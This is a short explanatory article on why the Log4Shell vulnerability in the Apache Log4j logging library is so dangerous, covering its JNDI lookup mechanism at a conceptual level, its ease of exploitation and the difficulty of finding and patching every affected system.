Why is Log4Shell so bad?
Apache Log4j is an open-source logging library used in millions of JAVA projects, including a substantial percentage of enterprise applications and cloud services. 1,800+ major GitHub repositories have dependencies on the Log4j logging library.
Log4j is used to log all sorts of data about how applications are being used, format it, and push it to various destinations. But, Log4j isn’t just a passive logging tool — it actively interprets the data that is being logged.
The Log4Shell exploit takes advantage of that feature, allowing attackers to use a specially crafted JNDI string to talk to Log4j. Log4j uses JNDI to perform a request to the attacker site, which then executes the attack payload.
Using this exploit requires very little technical expertise. This was initially discovered in the game Minecraft, in which users were issuing commands simply by using the JNDI string in a chatbox. Security researchers have also shown the ability to issue commands from devices such as iPhones and Tesla vehicles simply by changing the name of the device to the string.
Hopefully by now, many companies have taken action to protect their most critical applications and assets by updating their Log4j libraries and applying mitigations. However, the extreme widespread use of Log4j can make it very difficult to hunt down all of its uses within an enterprise. Any server or application that is not actively being maintained is at risk of being exploited by attackers. And, those who have been exploited may have to handle future attacks associated with fingerprinting performed and/or persistence mechanisms implemented by attackers. This exploit will likely haunt security teams for years to come.